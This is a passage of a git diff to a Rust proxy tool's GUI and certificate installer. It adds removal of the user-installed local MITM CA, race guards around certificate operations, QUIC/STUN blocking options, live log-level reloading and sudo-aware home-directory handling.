+                    ui.add(egui::TextEdit::singleline(&mut self.form.socks5_port)
+                        .desired_width(70.0))
+                    .labelled_by(socks_label.id);
                 });
             });
 
@@ -880,23 +1217,24 @@ impl eframe::App for App {
                          When set, non-HTTP / raw-TCP traffic (Telegram MTProto, IMAP, SSH, …) \
                          is chained through it instead of direct. HTTP/HTTPS still go through \
                          the Apps Script relay."
-                    ), |ui| {
+                    ), |ui, label_id| {
                         ui.add(egui::TextEdit::singleline(&mut self.form.upstream_socks5)
                             .hint_text("empty = direct; 127.0.0.1:50529 for local xray")
-                            .desired_width(f32::INFINITY));
+                            .desired_width(f32::INFINITY))
+                        .labelled_by(label_id);
                     });
 
                     form_row(ui, "Parallel dispatch", Some(
                         "Fire N Apps Script IDs in parallel per request and take the first \
                          response. 0/1 = off. 2-3 kills long-tail latency at N× quota cost. \
                          Only effective with multiple IDs configured."
-                    ), |ui| {
+                    ), |ui, _label_id| {
                         ui.add(egui::DragValue::new(&mut self.form.parallel_relay)
                             .speed(1)
                             .range(0..=8));
                     });
 
-                    form_row(ui, "Log level", None, |ui| {
+                    form_row(ui, "Log level", None, |ui, _label_id| {
                         egui::ComboBox::from_id_source("loglevel")
                             .selected_text(&self.form.log_level)
                             .show_ui(ui, |ui| {
@@ -937,6 +1275,25 @@ impl eframe::App for App {
                              Script relay instead — slower for video, but the visible SNI matches the site.",
                         );
                     });
+                    ui.horizontal(|ui| {
+                        ui.add_space(120.0 + 8.0);
+                        ui.checkbox(&mut self.form.block_quic, "Block QUIC (UDP/443)")
+                            .on_hover_text(
+                                "Drop QUIC (UDP port 443) so browsers fall back to TCP/HTTPS. \
+                                 QUIC over the TCP-based tunnel causes TCP-over-TCP meltdown \
+                                 (<1 Mbps). Browsers detect the drop and switch to TCP within seconds. \
+                                 Issue #213, #793.",
+                            );
+                    });
+                    ui.horizontal(|ui| {
+                        ui.add_space(120.0 + 8.0);
+                        ui.checkbox(&mut self.form.block_stun, "Block STUN/TURN UDP")
+                            .on_hover_text(
+                                "Drop WebRTC STUN/TURN UDP ports 3478, 5349, and 19302 so apps \
+                                 such as Meet, Discord, and WhatsApp move to TCP TURN instead of \
+                                 waiting on UDP ICE retries.",
+                            );
+                    });
                 });
             });
 
@@ -945,7 +1302,12 @@ impl eframe::App for App {
             ui.horizontal(|ui| {
                 if ui.add(primary_button("Save config")).clicked() {
                     match self.form.to_config().and_then(|c| save_config(&c)) {
-                        Ok(p) => self.toast = Some((format!("Saved to {}", p.display()), Instant::now())),
+                        Ok(p) => {
+                            // Apply the new log level live so users don't have to
+                            // restart for the combobox to take effect (#401).
+                            apply_log_level(&self.form.log_level);
+                            self.toast = Some((format!("Saved to {}", p.display()), Instant::now()));
+                        }
                         Err(e) => self.toast = Some((format!("Save failed: {}", e), Instant::now())),
                     }
                 }
@@ -1074,7 +1436,7 @@ impl eframe::App for App {
                             ),
                         ),
                         ("bytes today", fmt_bytes(s.today_bytes)),
-                        ("UTC day", s.today_key.clone()),
+                        ("PT day", s.today_key.clone()),
                         ("resets in", reset_str),
                     ];
                     egui::Grid::new("usage_today")
@@ -1209,9 +1571,54 @@ impl eframe::App for App {
             // Secondary actions — smaller, grouped together on their own line.
             ui.add_space(4.0);
             ui.horizontal(|ui| {
-                if ui.small_button("Install CA").clicked() {
-                    let _ = self.cmd_tx.send(Cmd::InstallCa);
-                }
+                // Install CA and Remove CA share a single in-flight flag
+                // so back-to-back clicks can't race — an in-flight
+                // install would otherwise re-trust the CA after Remove
+                // deleted it (or vice versa). Both buttons disable when
+                // either op is running.
+                let (cert_op_in_flight, proxy_active) = {
+                    let s = self.shared.state.lock().unwrap();
+                    (s.cert_op_in_progress, s.proxy_active)
+                };
+
+                let install_hover = if cert_op_in_flight {
+                    "A cert install/remove is already in progress."
+                } else {
+                    "Install the MITM CA into the OS trust store (and NSS if certutil \
+                     is available)."
+                };
+                ui.add_enabled_ui(!cert_op_in_flight, |ui| {
+                    if ui
+                        .small_button("Install CA")
+                        .on_hover_text(install_hover)
+                        .clicked()
+                    {
+                        let _ = self.cmd_tx.send(Cmd::InstallCa);
+                    }
+                });
+
+                let remove_hover = if proxy_active || running {
+                    "Stop the proxy first — the CA keypair is held in memory by the \
+                     running MITM engine, and removing it now would break HTTPS for \
+                     every site until restart."
+                } else if cert_op_in_flight {
+                    "A cert install/remove is already in progress."
+                } else {
+                    "Remove the MITM CA from the OS trust store (verified by name) \
+                     and delete the on-disk ca/ directory. NSS cleanup (Firefox/Chrome) \
+                     is best-effort and logs a hint if certutil is missing or a browser \
+                     has the DB locked. A fresh CA is generated the next time you start \
+                     the proxy. Your config.json and the Apps Script deployment are NOT \
+                     touched — no need to redeploy Code.gs."
+                };
+                ui.add_enabled_ui(!proxy_active && !running && !cert_op_in_flight, |ui| {
+                    if ui.small_button("Remove CA")
+                        .on_hover_text(remove_hover)
+                        .clicked()
+                    {
+                        let _ = self.cmd_tx.send(Cmd::RemoveCa);
+                    }
+                });
                 if ui.small_button("Check CA").clicked() {
                     let _ = self.cmd_tx.send(Cmd::CheckCaTrusted);
                 }
@@ -1588,11 +1995,19 @@ impl App {
                         for (i, row) in self.form.sni_pool.iter_mut().enumerate() {
                             ui.horizontal(|ui| {
                                 ui.checkbox(&mut row.enabled, "");
+                                let sni_label = ui.add_sized(
+                                    [0.0, 0.0],
+                                    egui::Label::new(
+                                        egui::RichText::new(format!("SNI name {}", i))
+                                            .color(egui::Color32::TRANSPARENT),
+                                    ),
+                                );
                                 ui.add(
                                     egui::TextEdit::singleline(&mut row.name)
                                         .desired_width(NAME_W)
                                         .font(egui::TextStyle::Monospace),
-                                );
+                                )
+                                .labelled_by(sni_label.id);
                                 let status_txt = match probe_map.get(&row.name) {
                                     Some(SniProbeState::Ok(ms)) => {
                                         egui::RichText::new(format!("ok  {} ms", ms))
@@ -1647,11 +2062,19 @@ impl App {
 
                 ui.separator();
                 ui.horizontal(|ui| {
+                    let custom_label = ui.add_sized(
+                        [0.0, 0.0],
+                        egui::Label::new(
+                            egui::RichText::new("Custom SNI")
+                                .color(egui::Color32::TRANSPARENT),
+                        ),
+                    );
                     ui.add(
                         egui::TextEdit::singleline(&mut self.form.sni_custom_input)
                             .hint_text("add a custom SNI (e.g. translate.google.com)")
                             .desired_width(280.0),
-                    );
+                    )
+                    .labelled_by(custom_label.id);
                     let add_clicked = ui.button("+ Add").clicked();
                     if add_clicked {
                         let new_name = self.form.sni_custom_input.trim().to_string();
@@ -1736,13 +2159,16 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                     });
                 }
             }
-            // In background_thread function, modify the Cmd::Start handler:
             Ok(Cmd::Start(cfg)) => {
                 if active.is_some() {
                     push_log(&shared, "[ui] already running");
                     continue;
                 }
                 push_log(&shared, "[ui] starting proxy...");
+                // Flip proxy_active synchronously so a `Remove CA` click
+                // queued in the same frame as Start is rejected before
+                // the MITM manager begins loading.
+                shared.state.lock().unwrap().proxy_active = true;
                 let shared2 = shared.clone();
                 let fronter_slot: Arc<AsyncMutex<Option<Arc<DomainFronter>>>> =
                     Arc::new(AsyncMutex::new(None));
@@ -1756,7 +2182,9 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                         Ok(m) => m,
                         Err(e) => {
                             push_log(&shared2, &format!("[ui] MITM init failed: {}", e));
-                            shared2.state.lock().unwrap().running = false;
+                            let mut s = shared2.state.lock().unwrap();
+                            s.running = false;
+                            s.proxy_active = false;
                             return;
                         }
                     };
@@ -1765,11 +2193,13 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                         Ok(s) => s,
                         Err(e) => {
                             push_log(&shared2, &format!("[ui] proxy build failed: {}", e));
-                            shared2.state.lock().unwrap().running = false;
+                            let mut st = shared2.state.lock().unwrap();
+                            st.running = false;
+                            st.proxy_active = false;
                             return;
                         }
                     };
-                    // `fronter()` is `None` in google_only (bootstrap) mode — the
+                    // `fronter()` is `None` in direct mode — the
                     // status panel's relay stats simply show no data in that case.
                     *fronter_slot2.lock().await = server.fronter();
                     {
@@ -1792,8 +2222,15 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                         push_log(&shared2, &format!("[ui] proxy error: {}", e));
                     }
 
-                    shared2.state.lock().unwrap().running = false;
-                    shared2.state.lock().unwrap().started_at = None;
+                    {
+                        let mut st = shared2.state.lock().unwrap();
+                        st.running = false;
+                        st.started_at = None;
+                        // Self-exit path (e.g. bind error after startup,
+                        // or normal shutdown without Cmd::Stop). The
+                        // Stop handler clears this too — either is fine.
+                        st.proxy_active = false;
+                    }
                     push_log(&shared2, "[ui] proxy stopped");
                 });
 
@@ -1819,13 +2256,50 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                         }
                     });
 
-                    shared.state.lock().unwrap().running = false;
-                    shared.state.lock().unwrap().started_at = None;
+                    let mut st = shared.state.lock().unwrap();
+                    st.running = false;
+                    st.started_at = None;
+                    st.proxy_active = false;
                 }
             }
 
             Ok(Cmd::Test(cfg)) => {
                 let shared2 = shared.clone();
+                // Short-circuit modes where `test_cmd::run` deliberately
+                // refuses (full mode, direct mode). Those return false
+                // even when the proxy is healthy, which surfaced as
+                // "Test failed" + alarming red status — see #665. Show
+                // a friendly notice instead and skip the test path.
+                let mode_kind = cfg.mode_kind().ok();
+                let mode_explainer = match mode_kind {
+                    Some(mhrv_rs::config::Mode::Full) => Some(
+                        "Test Relay is wired only for apps_script mode. \
+                         In full mode the data plane is the tunnel-node — \
+                         to verify it end-to-end, start the proxy and load \
+                         https://whatismyipaddress.com in your browser \
+                         via 127.0.0.1:8085. The IP shown should be your \
+                         tunnel-node's VPS IP. Tracking a real Full-mode \
+                         test in #160."
+                    ),
+                    Some(mhrv_rs::config::Mode::Direct) => Some(
+                        "Test Relay is wired only for apps_script mode. \
+                         In direct mode there is no Apps Script relay — \
+                         every request goes through the SNI-rewrite tunnel \
+                         straight to Google's edge. Verify by loading \
+                         https://www.google.com via the proxy."
+                    ),
+                    _ => None,
+                };
+                if let Some(msg) = mode_explainer {
+                    {
+                        let mut st = shared.state.lock().unwrap();
+                        st.last_test_ok = None;
+                        st.last_test_msg = msg.into();
+                        st.last_test_msg_at = Some(Instant::now());
+                    }
+                    push_log(&shared, &format!("[ui] test skipped: {}", msg));
+                    continue;
+                }
                 push_log(&shared, "[ui] running test...");
                 rt.spawn(async move {
                     let ok = test_cmd::run(&cfg).await;
@@ -1848,29 +2322,106 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                 });
             }
             Ok(Cmd::InstallCa) => {
+                // Share the cert-op flag with Remove CA so the two
+                // can't race. Gate and flip before spawning; the worker
+                // clears on exit.
+                {
+                    let mut st = shared.state.lock().unwrap();
+                    if st.cert_op_in_progress {
+                        push_log(
+                            &shared,
+                            "[ui] cert op already in progress — ignoring duplicate install",
+                        );
+                        continue;
+                    }
+                    st.cert_op_in_progress = true;
+                }
                 let shared2 = shared.clone();
                 std::thread::spawn(move || {
                     push_log(&shared2, "[ui] installing CA...");
                     let base = data_dir::data_dir();
-                    if let Err(e) = MitmCertManager::new_in(&base) {
-                        push_log(&shared2, &format!("[ui] CA init failed: {}", e));
-                        return;
-                    }
-                    let ca = base.join(CA_CERT_FILE);
-                    match install_ca(&ca) {
-                        Ok(()) => {
-                            push_log(&shared2, "[ui] CA install ok");
-                            let mut st = shared2.state.lock().unwrap();
+                    let result = (|| -> Result<(), String> {
+                        if let Err(e) = MitmCertManager::new_in(&base) {
+                            return Err(format!("CA init failed: {}", e));
+                        }
+                        let ca = base.join(CA_CERT_FILE);
+                        install_ca(&ca).map_err(|e| format!("CA install failed: {}", e))
+                    })();
+                    {
+                        let mut st = shared2.state.lock().unwrap();
+                        st.cert_op_in_progress = false;
+                        if result.is_ok() {
                             st.ca_trusted = Some(true);
                             st.ca_trusted_at = Some(Instant::now());
                         }
-                        Err(e) => {
-                            push_log(&shared2, &format!("[ui] CA install failed: {}", e));
+                    }
+                    match result {
+                        Ok(()) => push_log(&shared2, "[ui] CA install ok"),
+                        Err(msg) => {
+                            push_log(&shared2, &format!("[ui] {}", msg));
                             push_log(&shared2, "[ui] hint: run the terminal binary with sudo/admin: mhrv-rs --install-cert");
                         }
                     }
                 });
             }
+            Ok(Cmd::RemoveCa) => {
+                // Authoritative proxy-active guard: the UI button is
+                // disabled when proxy_active/running is set, but a
+                // Cmd::RemoveCa may already be queued by the time the
+                // Start handler flips the flag. `active` is owned by
+                // this thread so its state is the real source of truth
+                // — reject removal any time a proxy handle is alive,
+                // whether it's still starting or fully running.
+                if active.is_some() {
+                    push_log(
+                        &shared,
+                        "[ui] cannot remove CA: proxy is running or starting — stop it first",
+                    );
+                    continue;
+                }
+                // Shared cert-op gate: covers Install CA too, so back-
+                // to-back Install → Remove clicks can't race. The
+                // button is already disabled while this is set, but a
+                // queued command can still arrive here.
+                {
+                    let mut st = shared.state.lock().unwrap();
+                    if st.cert_op_in_progress {
+                        push_log(
+                            &shared,
+                            "[ui] cert op already in progress — ignoring duplicate remove",
+                        );
+                        continue;
+                    }
+                    st.cert_op_in_progress = true;
+                }
+                let shared2 = shared.clone();
+                std::thread::spawn(move || {
+                    push_log(&shared2, "[ui] removing CA (trust store + files)...");
+                    let base = data_dir::data_dir();
+                    let result = remove_ca(&base);
+                    {
+                        let mut st = shared2.state.lock().unwrap();
+                        st.cert_op_in_progress = false;
+                        if result.is_ok() {
+                            st.ca_trusted = Some(false);
+                            st.ca_trusted_at = Some(Instant::now());
+                        }
+                    }
+                    match result {
+                        Ok(outcome) => {
+                            push_log(&shared2, &format!("[ui] {}", outcome.summary()));
+                            push_log(
+                                &shared2,
+                                "[ui] config.json and Apps Script deployment untouched",
+                            );
+                        }
+                        Err(e) => {
+                            push_log(&shared2, &format!("[ui] CA remove failed: {}", e));
+                            push_log(&shared2, "[ui] hint: run the terminal binary with sudo/admin: mhrv-rs --remove-cert");
+                        }
+                    }
+                });
+            }
             Ok(Cmd::TestSni { google_ip, sni }) => {
                 let shared2 = shared.clone();
                 {
@@ -1915,7 +2466,21 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                 std::thread::spawn(move || {
                     let base = data_dir::data_dir();
                     let ca = base.join(CA_CERT_FILE);
-                    let trusted = mhrv_rs::cert_installer::is_ca_trusted(&ca);
+                    let file_exists = ca.exists();
+                    // Probe the trust store by name — independent of
+                    // whether the on-disk ca.crt happens to be there.
+                    // The file and the trust-store entry can be out of
+                    // sync (e.g. after a partial removal), and that
+                    // mismatch is exactly what Check CA must surface.
+                    let trusted = mhrv_rs::cert_installer::is_ca_trusted_by_name();
+                    push_log(
+                        &shared2,
+                        &format!(
+                            "[ui] check CA: file={} trust_store={}",
+                            if file_exists { "present" } else { "missing" },
+                            if trusted { "trusted" } else { "not trusted" },
+                        ),
+                    );
                     let mut st = shared2.state.lock().unwrap();
                     st.ca_trusted = Some(trusted);
                     st.ca_trusted_at = Some(Instant::now());
@@ -1930,7 +2495,10 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
                 }
                 rt.spawn(async move {
                     let result = mhrv_rs::update_check::check(route).await;
-                    push_log(&shared2, &format!("[ui] update check: {}", result.summary()));
+                    push_log(
+                        &shared2,
+                        &format!("[ui] update check: {}", result.summary()),
+                    );
                     {
                         let mut st = shared2.state.lock().unwrap();
                         st.last_update_check = Some(UpdateProbeState::Done(result));
@@ -1990,14 +2558,19 @@ fn background_thread(shared: Arc<Shared>, rx: Receiver<Cmd>) {
 /// Install a tracing subscriber that mirrors every log event into the UI's
 /// Recent log panel.
 ///
-/// Respects `RUST_LOG` if set. Otherwise defaults to `info` — which is what
-/// users mean when they pick a non-default log level in the form. (trace /
-/// debug flip too much noise for a local GUI, so the combo-box changes level
-/// live via the `reload` handle that `with_env_filter` gives us but we keep
-/// the default boot-time level at info so first-run behavior is sensible.)
-fn install_ui_tracing(shared: Arc<Shared>) {
+/// Filter precedence (issue #401, v1.8.2):
+///   1. `RUST_LOG` env var, if set
+///   2. The saved form's `log_level` (passed in from the loaded config)
+///   3. `info,hyper=warn` as a sensible default
+///
+/// The constructed filter is wrapped in a `reload::Layer` and the handle
+/// is stashed in `LOG_RELOAD` so that a Save inside the running UI can
+/// reinstall the filter without a restart. See `apply_log_level`.
+fn install_ui_tracing(shared: Arc<Shared>, config_level: &str) {
     use tracing_subscriber::fmt::MakeWriter;
-    use tracing_subscriber::EnvFilter;
+    use tracing_subscriber::layer::SubscriberExt;
+    use tracing_subscriber::util::SubscriberInitExt;
+    use tracing_subscriber::{reload, EnvFilter};
 
     /// A MakeWriter that pushes each line into the shared log panel.
     struct UiLogWriter {
@@ -2051,19 +2624,71 @@ fn install_ui_tracing(shared: Arc<Shared>) {
         }
     }
 
-    let filter =
-        EnvFilter::try_from_default_env().unwrap_or_else(|_| EnvFilter::new("info,hyper=warn"));
+    // RUST_LOG > config.log_level > "info,hyper=warn"
+    let filter = EnvFilter::try_from_default_env().unwrap_or_else(|_| {
+        let trimmed = config_level.trim();
+        if trimmed.is_empty() {
+            EnvFilter::new("info,hyper=warn")
+        } else {
+            EnvFilter::try_new(trimmed).unwrap_or_else(|_| EnvFilter::new("info,hyper=warn"))
+        }
+    });
+
+    let (filter_layer, reload_handle) = reload::Layer::new(filter);
+    if LOG_RELOAD.set(reload_handle).is_err() {
+        // Already initialized — install_ui_tracing got called twice. Bail
+        // silently rather than panic; the existing subscriber stays live.
+        return;
+    }
 
     let writer = UiLogWriter { shared };
 
-    let _ = tracing_subscriber::fmt()
-        .with_env_filter(filter)
+    let fmt_layer = tracing_subscriber::fmt::layer()
         .with_target(false)
         .with_ansi(false)
-        .with_writer(writer)
+        .with_writer(writer);
+
+    let _ = tracing_subscriber::registry()
+        .with(filter_layer)
+        .with(fmt_layer)
         .try_init();
 }
 
+/// Reload handle for the UI's tracing EnvFilter — populated once at startup
+/// by `install_ui_tracing`. `apply_log_level` uses it to swap in a new
+/// filter when the user clicks Save with a different log level (#401).
+static LOG_RELOAD: std::sync::OnceLock<
+    tracing_subscriber::reload::Handle<
+        tracing_subscriber::EnvFilter,
+        tracing_subscriber::Registry,
+    >,
+> = std::sync::OnceLock::new();
+
+/// Reinstall the tracing filter at runtime. Called from the Save handler
+/// so the user's new `log_level` takes effect without a restart. RUST_LOG
+/// still wins if it was set at process start — explicit override beats
+/// config in both directions.
+fn apply_log_level(level: &str) {
+    use tracing_subscriber::EnvFilter;
+    let Some(handle) = LOG_RELOAD.get() else {
+        return;
+    };
+    if std::env::var_os("RUST_LOG").is_some() {
+        // RUST_LOG was set explicitly at boot — don't silently override.
+        return;
+    }
+    let trimmed = level.trim();
+    let new = if trimmed.is_empty() {
+        EnvFilter::new("info,hyper=warn")
+    } else {
+        match EnvFilter::try_new(trimmed) {
+            Ok(f) => f,
+            Err(_) => return,
+        }
+    };
+    let _ = handle.modify(|f| *f = new);
+}
+
 /// Where we drop downloaded release assets. Prefer the OS user Downloads
 /// dir (via the directories crate that's already in our tree), fall back
 /// to the user-data dir for platforms that don't expose one (edge case).
diff --git a/src/cert_installer.rs b/src/cert_installer.rs
index 0d6eb21e..3e0884dd 100644
--- a/src/cert_installer.rs
+++ b/src/cert_installer.rs
@@ -1,7 +1,7 @@
-use std::path::Path;
+use std::path::{Path, PathBuf};
 use std::process::Command;
 
-use crate::mitm::CERT_NAME;
+use crate::mitm::{CA_DIR, CERT_NAME};
 
 #[derive(Debug, thiserror::Error)]
 pub enum InstallError {
@@ -11,6 +11,180 @@ pub enum InstallError {
     Failed,
     #[error("unsupported platform: {0}")]
     Unsupported(String),
+    #[error("io {path}: {source}")]
+    Io {
+        path: PathBuf,
+        #[source]
+        source: std::io::Error,
+    },
+    #[error("CA still trusted after removal — re-run with admin/sudo")]
+    RemovalIncomplete,
+}
+
+/// Structured outcome of a successful `remove_ca` call. The OS trust
+/// store is always fully clean when we return `Ok(_)` (that's verified
+/// by `is_ca_trusted_by_name` before file deletion), but NSS cleanup is
+/// best-effort — callers need the nuance to print accurate status.
+///
+/// UI/CLI should treat `Clean` as "nothing more to do" and
+/// `NssIncomplete` as a non-fatal warning ("OS CA removed, browser
+/// cleanup partial — follow the logged hint").
+#[derive(Debug, Clone, Copy)]
+pub enum RemovalOutcome {
+    Clean,
+    NssIncomplete(NssReport),
+}
+
+impl RemovalOutcome {
+    /// One-line summary suitable for a log line or status banner.
+    pub fn summary(&self) -> String {
+        match self {
+            RemovalOutcome::Clean => "CA removed.".to_string(),
+            RemovalOutcome::NssIncomplete(r) if r.tool_missing_with_stores_present => {
+                "OS CA removed. NSS cleanup skipped — NSS certutil not found.".to_string()
+            }
+            RemovalOutcome::NssIncomplete(r) => format!(
+                "OS CA removed. NSS cleanup partial: {}/{} browser stores updated.",
+                r.ok, r.tried
+            ),
+        }
+    }
+}
+
+/// When running as root via `sudo`, the process's `HOME` / `USER`
+/// environment reflects **root**, not the user who invoked the command.
+/// That breaks every user-scoped cert path this module touches —
+/// `data_dir()` resolves to root's config dir, `mozilla_family_profile_dirs()`
+/// scans root's profiles, macOS `login.keychain-db` is root's. The
+/// removal then operates on paths that probably don't exist, reports
+/// success, and leaves the real user's CA trusted.
+///
+/// This helper detects the real `sudo` case (`geteuid() == 0` AND
+/// `SUDO_USER` set to a non-root user), resolves the invoking user's
+/// home dir (SUDO_HOME, `getent passwd`, or `/Users/$SUDO_USER` /
+/// `/home/$SUDO_USER` fallback), and rewrites `HOME` for the remainder
+/// of the process. The EUID gate is load-bearing: `SUDO_USER` alone is
+/// not proof of elevation (a user can export it, inherit it, or use
+/// `sudo -E`), and blindly trusting it would let a non-root process
+/// redirect config/CA/profile operations to another user's files.
+/// Call once at the top of `main` in every binary (CLI + UI) before
+/// anything else reads HOME. No-op on Windows (UAC keeps the user's
+/// HOME intact) and on non-sudo Unix invocations.
+pub fn reconcile_sudo_environment() {
+    #[cfg(unix)]
+    unix::reconcile_sudo_home();
+}
+
+#[cfg(unix)]
+mod unix {
+    use super::{should_reconcile_for, sudo_parse_passwd_home};
+    use std::path::Path;
+    use std::process::Command;
+
+    pub(super) fn reconcile_sudo_home() {
+        // SAFETY: geteuid() is async-signal-safe and cannot fail.
+        let euid = unsafe { libc::geteuid() };
+        let sudo_user_raw = std::env::var("SUDO_USER").ok();
+        let Some(sudo_user) = should_reconcile_for(euid, sudo_user_raw.as_deref()) else {
+            return;
+        };
+        let sudo_user = sudo_user.to_string();
+        match resolve_home(&sudo_user) {
+            Some(home) => {
+                tracing::info!(
+                    "Detected sudo invocation (SUDO_USER={}): re-rooting HOME to {} \
+                     so user-scoped cert paths target the real user.",
+                    sudo_user,
+                    home
+                );
+                // SAFETY: reconcile_sudo_environment runs at the top of
+                // main() before any other thread is spawned and before
+                // any code has cached HOME.
+                std::env::set_var("HOME", home);
+            }
+            None => {
+                tracing::warn!(
+                    "Running under sudo (SUDO_USER={}), but could not resolve \
+                     the user's home dir. Cert paths will operate on root's \
+                     HOME — which may NOT match where you installed the CA. \
+                     Prefer running without sudo; the app invokes sudo \
+                     internally for system-level steps.",
+                    sudo_user
+                );
+            }
+        }
+    }
+
+    fn resolve_home(sudo_user: &str) -> Option<String> {
+        // Some sudoers configs export SUDO_HOME; prefer it when present.
+        if let Ok(h) = std::env::var("SUDO_HOME") {
+            if !h.is_empty() {
+                return Some(h);
+            }
+        }
+        // Linux: `getent passwd <user>` returns the full passwd entry.
+        if let Ok(out) = Command::new("getent").args(["passwd", sudo_user]).output() {
+            if out.status.success() {
+                let line = String::from_utf8_lossy(&out.stdout);
+                if let Some(h) = sudo_parse_passwd_home(&line) {
+                    return Some(h);
+                }
+            }
+        }
+        // macOS has no getent. Fall back to the convention for both
+        // platforms — verify the dir actually exists before returning.
+        for root in ["/Users", "/home"] {
+            let candidate = format!("{}/{}", root, sudo_user);
+            if Path::new(&candidate).exists() {
+                return Some(candidate);
+            }
+        }
+        None
+    }
+}
+
+/// Decide whether to re-root HOME for a sudo-style invocation, given a
+/// process's effective UID and the value of the `SUDO_USER` env var.
+/// Returns `Some(user)` if and only if we should re-root HOME to that
+/// user's dir; `None` in every other case (normal user, real root
+/// login without sudo, SUDO_USER missing / empty / literally "root").
+///
+/// Extracted as a pure function so every branch — including the
+/// load-bearing `euid == 0 && SUDO_USER unset` path that must leave
+/// HOME as root's own /root — can be asserted with unit tests.
+/// Always compiled so the tests run on every host.
+fn should_reconcile_for<'a>(euid: u32, sudo_user: Option<&'a str>) -> Option<&'a str> {
+    // EUID gate: if we're not actually root, `SUDO_USER` could be
+    // anything (inherited from a shell init, explicitly exported,
+    // set via `sudo -E`) and rewriting HOME based on it would let a
+    // normal-user process redirect cert paths to someone else's files.
+    if euid != 0 {
+        return None;
+    }
+    // Real root login (no sudo) — SUDO_USER is simply unset. Do NOT
+    // re-root: root's own /root is the correct HOME for that process.
+    let user = sudo_user?;
+    // Empty string or literal "root" also mean "nothing to reconcile".
+    if user.is_empty() || user == "root" {
+        return None;
+    }
+    Some(user)
+}
+
+/// Pure parser for a single-line `getent passwd` entry.
+/// Always compiled so unit tests can run on every host.
+fn sudo_parse_passwd_home(content: &str) -> Option<String> {
+    let line = content.lines().next()?;
+    let fields: Vec<&str> = line.split(':').collect();
+    // passwd format: name:pw:uid:gid:gecos:home:shell
+    if fields.len() < 7 {
+        return None;
+    }
+    let home = fields[5].trim();
+    if home.is_empty() {
+        return None;
+    }
+    Some(home.to_string())
 }
 
 /// Install the CA certificate at `path` into the system trust store.
@@ -46,12 +220,108 @@ pub fn install_ca(path: &Path) -> Result<(), InstallError> {
     }
 }
 
+/// Remove the CA from the OS trust store, best-effort NSS stores (Firefox
+/// profiles + Chrome/Chromium on Linux), and delete the on-disk
+/// `ca/ca.crt` + `ca/ca.key`. A fresh CA will be regenerated the next
+/// time the proxy starts — and since the Apps Script deployment lives on
+/// Google's side and `config.json` is never touched here, the user does
+/// not have to redeploy `Code.gs` or re-enter their deployment ID.
+/// Platform-specific — may require admin/sudo for system stores.
+///
+/// Safety property: we verify the OS trust store with `is_ca_trusted`
+/// before deleting `ca/`. If the stale root is still trusted (e.g.
+/// because the system-store delete needed admin and we didn't have it),
+/// we return `RemovalIncomplete` and leave the on-disk files alone — a
+/// regenerated CA with a fresh keypair would otherwise mismatch the
+/// stale trusted root and silently break every HTTPS MITM leaf.
+pub fn remove_ca(base: &Path) -> Result<RemovalOutcome, InstallError> {
+    let os = std::env::consts::OS;
+    tracing::info!("Removing CA certificate on {}...", os);
+
+    // Platforms that merge anchor files into a bundle/database (Linux)
+    // must report whether the refresh step succeeded — the bundle may
+    // still contain the CA even after the anchor file is gone. macOS
+    // and Windows write directly to their stores, so there's nothing
+    // separate to refresh; they rely entirely on the by-name probe.
+    let platform_ok = match os {
+        "macos" => {
+            remove_macos();
+            true
+        }
+        "linux" => remove_linux(),
+        "windows" => {
+            remove_windows();
+            true
+        }
+        other => return Err(InstallError::Unsupported(other.to_string())),
+    };
+
+    // Verify OS trust store removal BEFORE touching browser state. If
+    // the OS removal didn't actually land (e.g. machine-store delete
+    // needed admin we don't have, or a Linux refresh cmd failed), we
+    // must not also strip NSS entries + the Firefox enterprise_roots
+    // pref — that leaves the system in an inconsistent "half-removed"
+    // state (OS still trusts, but Firefox is newly reconfigured) that
+    // only confuses the user. Returning RemovalIncomplete here keeps
+    // the install pristine so a retry is idempotent.
+    //
+    // Must be path-independent — the on-disk cert file may already be
+    // missing for unrelated reasons, and a file-gated check would then
+    // mask a still-trusted stale root.
+    if !platform_ok || is_ca_trusted_by_name() {
+        tracing::error!(
+            "MITM CA is still trusted after OS removal attempt \
+             (platform_ok={}) — refusing to touch browser state or \
+             delete on-disk files. Re-run with admin/sudo to complete \
+             revocation.",
+            platform_ok
+        );
+        return Err(InstallError::RemovalIncomplete);
+    }
+
+    // OS store is clean — only now mutate browser state.
+    let nss = remove_nss_stores();
+
+    let ca_dir = base.join(CA_DIR);
+    if ca_dir.exists() {
+        if let Err(e) = std::fs::remove_dir_all(&ca_dir) {
+            tracing::error!("failed to delete {}: {}", ca_dir.display(), e);
+            return Err(InstallError::Io {
+                path: ca_dir.clone(),
+                source: e,
+            });
+        }
+        tracing::info!("Deleted CA files at {}", ca_dir.display());
+    }
+
+    if nss.is_clean() {
+        Ok(RemovalOutcome::Clean)
+    } else {
+        Ok(RemovalOutcome::NssIncomplete(nss))
+    }
+}
+
 /// Heuristic check: is the CA already in the trust store?
 /// Best-effort — on unknown state we return false to always attempt install.
+///
+/// The `path` guard skips the trust-store probe when the local CA file
+/// is missing, because at install time "no file = nothing to trust" is a
+/// useful shortcut. Revocation uses `is_ca_trusted_by_name` instead —
+/// that path must verify the store regardless of whether the file still
+/// exists, otherwise a pre-deleted `ca.crt` would mask a lingering
+/// trusted root.
 pub fn is_ca_trusted(path: &Path) -> bool {
     if !path.exists() {
         return false;
     }
+    is_ca_trusted_by_name()
+}
+
+/// Path-independent variant of `is_ca_trusted`: queries the OS trust
+/// store by cert name (CERT_NAME) without requiring the on-disk cert
+/// file. Used by `remove_ca` to verify revocation completed even if the
+/// local `ca.crt` was already missing or deleted mid-flight.
+pub fn is_ca_trusted_by_name() -> bool {
     match std::env::consts::OS {
         "macos" => is_trusted_macos(),
         "linux" => is_trusted_linux(),
@@ -115,6 +385,73 @@ fn install_macos(cert_path: &str) -> bool {
     false
 }
 
+/// Delete the CA from the login keychain (no sudo) and, only when a
+/// probe confirms the cert actually lives there, the system keychain
+/// (sudo). Probing first avoids prompting the user — or hanging the
+/// UI's GUI-spawned `sudo` — for a password they don't need when the
+/// cert was only ever installed in the login keychain (the default
+/// path). Exit status is best-effort: `security delete-certificate`
